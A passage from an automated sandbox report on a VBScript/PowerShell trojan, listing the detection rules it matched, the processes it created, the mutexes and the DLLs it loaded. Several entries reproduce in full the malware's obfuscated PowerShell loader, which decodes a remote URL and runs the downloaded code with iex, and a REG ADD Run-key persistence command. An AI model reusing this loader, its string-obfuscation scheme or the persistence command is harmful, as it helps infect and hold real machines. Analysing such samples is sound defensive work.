              Source: amsi32_4040.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4788, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4040, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@17/8@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Akenbold.udfJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\5w6Cp63r66k4Jxsj
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tajbn5b.0xw.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4788
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4040
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\temp.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Akenbold.udf && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
